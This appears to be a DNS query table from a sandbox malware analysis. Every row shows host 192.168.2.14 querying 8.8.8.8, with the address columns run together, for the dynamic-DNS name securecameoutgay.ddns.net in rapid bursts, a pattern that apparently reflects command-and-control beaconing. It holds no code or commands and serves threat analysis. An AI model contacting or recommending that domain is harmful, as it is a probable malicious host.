                                                    Oct 12, 2024 23:06:01.689594984 CEST192.168.2.148.8.8.80x266eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:01.696670055 CEST192.168.2.148.8.8.80xe753Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:01.703172922 CEST192.168.2.148.8.8.80xe753Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:01.709903002 CEST192.168.2.148.8.8.80xe753Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:01.716730118 CEST192.168.2.148.8.8.80xe753Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:01.723326921 CEST192.168.2.148.8.8.80xe753Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:01.730556011 CEST192.168.2.148.8.8.80x2b7cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:01.738549948 CEST192.168.2.148.8.8.80x2b7cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:01.745098114 CEST192.168.2.148.8.8.80x2b7cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:01.751835108 CEST192.168.2.148.8.8.80x2b7cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:01.758531094 CEST192.168.2.148.8.8.80x2b7cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:01.765552998 CEST192.168.2.148.8.8.80x69f6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:01.772212982 CEST192.168.2.148.8.8.80x69f6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:01.778743029 CEST192.168.2.148.8.8.80x69f6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:01.787549973 CEST192.168.2.148.8.8.80x69f6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:01.794050932 CEST192.168.2.148.8.8.80x69f6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:01.800822973 CEST192.168.2.148.8.8.80xf75eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:01.807301998 CEST192.168.2.148.8.8.80xf75eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:01.814095020 CEST192.168.2.148.8.8.80xf75eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:01.820779085 CEST192.168.2.148.8.8.80xf75eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:01.829257965 CEST192.168.2.148.8.8.80xf75eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:01.836127043 CEST192.168.2.148.8.8.80x6578Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:01.852004051 CEST192.168.2.148.8.8.80x6578Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:01.859730005 CEST192.168.2.148.8.8.80x6578Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:01.867206097 CEST192.168.2.148.8.8.80x6578Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:01.876208067 CEST192.168.2.148.8.8.80x6578Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:01.882925987 CEST192.168.2.148.8.8.80x307aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:01.889733076 CEST192.168.2.148.8.8.80x307aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:01.897388935 CEST192.168.2.148.8.8.80x307aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:01.904917955 CEST192.168.2.148.8.8.80x307aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:01.911587954 CEST192.168.2.148.8.8.80x307aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:01.918426991 CEST192.168.2.148.8.8.80xaa25Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:01.925065994 CEST192.168.2.148.8.8.80xaa25Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:01.934001923 CEST192.168.2.148.8.8.80xaa25Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:01.941139936 CEST192.168.2.148.8.8.80xaa25Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:01.947900057 CEST192.168.2.148.8.8.80xaa25Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:01.954633951 CEST192.168.2.148.8.8.80x8832Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:01.961528063 CEST192.168.2.148.8.8.80x8832Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:01.968424082 CEST192.168.2.148.8.8.80x8832Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:01.975348949 CEST192.168.2.148.8.8.80x8832Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:01.981997967 CEST192.168.2.148.8.8.80x8832Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:01.988998890 CEST192.168.2.148.8.8.80x8265Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:01.995810032 CEST192.168.2.148.8.8.80x8265Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:02.002405882 CEST192.168.2.148.8.8.80x8265Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:02.009203911 CEST192.168.2.148.8.8.80x8265Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:02.015785933 CEST192.168.2.148.8.8.80x8265Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:02.022341967 CEST192.168.2.148.8.8.80xf24fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:02.028959990 CEST192.168.2.148.8.8.80xf24fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:02.036339045 CEST192.168.2.148.8.8.80xf24fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:02.043620110 CEST192.168.2.148.8.8.80xf24fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:02.050673962 CEST192.168.2.148.8.8.80xf24fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:02.057517052 CEST192.168.2.148.8.8.80xe3a9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:02.064136982 CEST192.168.2.148.8.8.80xe3a9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:02.070653915 CEST192.168.2.148.8.8.80xe3a9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:02.077594995 CEST192.168.2.148.8.8.80xe3a9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:02.084170103 CEST192.168.2.148.8.8.80xe3a9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:02.091473103 CEST192.168.2.148.8.8.80x9f77Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:02.098177910 CEST192.168.2.148.8.8.80x9f77Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:02.105078936 CEST192.168.2.148.8.8.80x9f77Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:02.111859083 CEST192.168.2.148.8.8.80x9f77Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:02.118778944 CEST192.168.2.148.8.8.80x9f77Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:02.125469923 CEST192.168.2.148.8.8.80x3dd4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:02.133732080 CEST192.168.2.148.8.8.80x3dd4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:02.141697884 CEST192.168.2.148.8.8.80x3dd4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:02.148319960 CEST192.168.2.148.8.8.80x3dd4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:02.155109882 CEST192.168.2.148.8.8.80x3dd4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:02.161863089 CEST192.168.2.148.8.8.80x83a8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:02.168663025 CEST192.168.2.148.8.8.80x83a8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:02.175371885 CEST192.168.2.148.8.8.80x83a8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:02.182281017 CEST192.168.2.148.8.8.80x83a8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:02.189110041 CEST192.168.2.148.8.8.80x83a8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:02.196018934 CEST192.168.2.148.8.8.80x8964Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:02.202677011 CEST192.168.2.148.8.8.80x8964Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:02.209377050 CEST192.168.2.148.8.8.80x8964Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:02.216392040 CEST192.168.2.148.8.8.80x8964Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:02.223280907 CEST192.168.2.148.8.8.80x8964Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:02.230066061 CEST192.168.2.148.8.8.80x4cbdStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:02.236671925 CEST192.168.2.148.8.8.80x4cbdStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:02.245898008 CEST192.168.2.148.8.8.80x4cbdStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:02.253283024 CEST192.168.2.148.8.8.80x4cbdStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:02.259840012 CEST192.168.2.148.8.8.80x4cbdStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:02.266489983 CEST192.168.2.148.8.8.80x103aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:02.273281097 CEST192.168.2.148.8.8.80x103aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:02.279876947 CEST192.168.2.148.8.8.80x103aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:02.286690950 CEST192.168.2.148.8.8.80x103aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:02.293210983 CEST192.168.2.148.8.8.80x103aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:02.299789906 CEST192.168.2.148.8.8.80x3646Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:02.306529045 CEST192.168.2.148.8.8.80x3646Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:02.313250065 CEST192.168.2.148.8.8.80x3646Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:02.320054054 CEST192.168.2.148.8.8.80x3646Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:02.327049971 CEST192.168.2.148.8.8.80x3646Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:02.336563110 CEST192.168.2.148.8.8.80x6e39Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:02.346157074 CEST192.168.2.148.8.8.80x6e39Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:02.353091955 CEST192.168.2.148.8.8.80x6e39Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:02.359891891 CEST192.168.2.148.8.8.80x6e39Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:02.366925001 CEST192.168.2.148.8.8.80x6e39Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:02.373800039 CEST192.168.2.148.8.8.80xfaf9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:02.383042097 CEST192.168.2.148.8.8.80xfaf9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:02.389347076 CEST192.168.2.148.8.8.80xfaf9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:02.395901918 CEST192.168.2.148.8.8.80xfaf9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:02.402549982 CEST192.168.2.148.8.8.80xfaf9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:02.409179926 CEST192.168.2.148.8.8.80xe0dfStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:02.416043997 CEST192.168.2.148.8.8.80xe0dfStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:02.422771931 CEST192.168.2.148.8.8.80xe0dfStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:02.429795980 CEST192.168.2.148.8.8.80xe0dfStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:02.436285973 CEST192.168.2.148.8.8.80xe0dfStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:02.442702055 CEST192.168.2.148.8.8.80x4133Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:02.457030058 CEST192.168.2.148.8.8.80x4133Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:02.464365005 CEST192.168.2.148.8.8.80x4133Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:02.471827984 CEST192.168.2.148.8.8.80x4133Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:02.479227066 CEST192.168.2.148.8.8.80x4133Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:02.486615896 CEST192.168.2.148.8.8.80x7764Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:02.493701935 CEST192.168.2.148.8.8.80x7764Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:02.501066923 CEST192.168.2.148.8.8.80x7764Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:02.508069038 CEST192.168.2.148.8.8.80x7764Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:02.515105963 CEST192.168.2.148.8.8.80x7764Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:02.522742033 CEST192.168.2.148.8.8.80xc320Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:02.529678106 CEST192.168.2.148.8.8.80xc320Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:02.537024975 CEST192.168.2.148.8.8.80xc320Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:02.544028997 CEST192.168.2.148.8.8.80xc320Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:02.551168919 CEST192.168.2.148.8.8.80xc320Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:02.558609962 CEST192.168.2.148.8.8.80x9493Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:02.566354036 CEST192.168.2.148.8.8.80x9493Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:02.573481083 CEST192.168.2.148.8.8.80x9493Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:02.581190109 CEST192.168.2.148.8.8.80x9493Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:02.588565111 CEST192.168.2.148.8.8.80x9493Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:02.595833063 CEST192.168.2.148.8.8.80xf710Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:02.603112936 CEST192.168.2.148.8.8.80xf710Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:02.610457897 CEST192.168.2.148.8.8.80xf710Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:02.618300915 CEST192.168.2.148.8.8.80xf710Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:02.625849962 CEST192.168.2.148.8.8.80xf710Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:02.632925034 CEST192.168.2.148.8.8.80x4ef3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:02.639848948 CEST192.168.2.148.8.8.80x4ef3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:02.647134066 CEST192.168.2.148.8.8.80x4ef3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:02.654438019 CEST192.168.2.148.8.8.80x4ef3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:02.661619902 CEST192.168.2.148.8.8.80x4ef3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:02.668803930 CEST192.168.2.148.8.8.80x53c0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:02.676296949 CEST192.168.2.148.8.8.80x53c0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:02.683192015 CEST192.168.2.148.8.8.80x53c0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:02.690289974 CEST192.168.2.148.8.8.80x53c0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:02.697061062 CEST192.168.2.148.8.8.80x53c0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:02.704319954 CEST192.168.2.148.8.8.80xb5b7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:02.711117983 CEST192.168.2.148.8.8.80xb5b7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:02.718262911 CEST192.168.2.148.8.8.80xb5b7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:02.725440025 CEST192.168.2.148.8.8.80xb5b7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:02.732258081 CEST192.168.2.148.8.8.80xb5b7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:02.739818096 CEST192.168.2.148.8.8.80x383fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:02.747417927 CEST192.168.2.148.8.8.80x383fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:02.756944895 CEST192.168.2.148.8.8.80x383fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:02.763518095 CEST192.168.2.148.8.8.80x383fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:02.770400047 CEST192.168.2.148.8.8.80x383fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:02.777723074 CEST192.168.2.148.8.8.80xa157Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:02.784598112 CEST192.168.2.148.8.8.80xa157Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:02.791809082 CEST192.168.2.148.8.8.80xa157Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:02.798388958 CEST192.168.2.148.8.8.80xa157Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:02.805658102 CEST192.168.2.148.8.8.80xa157Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:02.812863111 CEST192.168.2.148.8.8.80xb771Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:02.820077896 CEST192.168.2.148.8.8.80xb771Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:02.827963114 CEST192.168.2.148.8.8.80xb771Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:02.835326910 CEST192.168.2.148.8.8.80xb771Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:02.842432976 CEST192.168.2.148.8.8.80xb771Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:02.849757910 CEST192.168.2.148.8.8.80x628eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:02.858108044 CEST192.168.2.148.8.8.80x628eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:02.865462065 CEST192.168.2.148.8.8.80x628eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:02.872459888 CEST192.168.2.148.8.8.80x628eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:02.878809929 CEST192.168.2.148.8.8.80x628eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:02.885493994 CEST192.168.2.148.8.8.80xd807Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:02.892560959 CEST192.168.2.148.8.8.80xd807Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:02.899346113 CEST192.168.2.148.8.8.80xd807Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:02.906382084 CEST192.168.2.148.8.8.80xd807Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:02.913324118 CEST192.168.2.148.8.8.80xd807Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:02.919734001 CEST192.168.2.148.8.8.80x887aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:02.926431894 CEST192.168.2.148.8.8.80x887aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:02.933063984 CEST192.168.2.148.8.8.80x887aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:02.939691067 CEST192.168.2.148.8.8.80x887aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:02.946258068 CEST192.168.2.148.8.8.80x887aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:02.953206062 CEST192.168.2.148.8.8.80xcb2aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:02.960438967 CEST192.168.2.148.8.8.80xcb2aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:02.966841936 CEST192.168.2.148.8.8.80xcb2aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:02.973584890 CEST192.168.2.148.8.8.80xcb2aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:02.980287075 CEST192.168.2.148.8.8.80xcb2aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:02.987201929 CEST192.168.2.148.8.8.80x1773Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:02.994012117 CEST192.168.2.148.8.8.80x1773Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:03.000701904 CEST192.168.2.148.8.8.80x1773Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:03.007862091 CEST192.168.2.148.8.8.80x1773Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:03.014360905 CEST192.168.2.148.8.8.80x1773Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:03.020939112 CEST192.168.2.148.8.8.80xa74eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:03.027889013 CEST192.168.2.148.8.8.80xa74eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
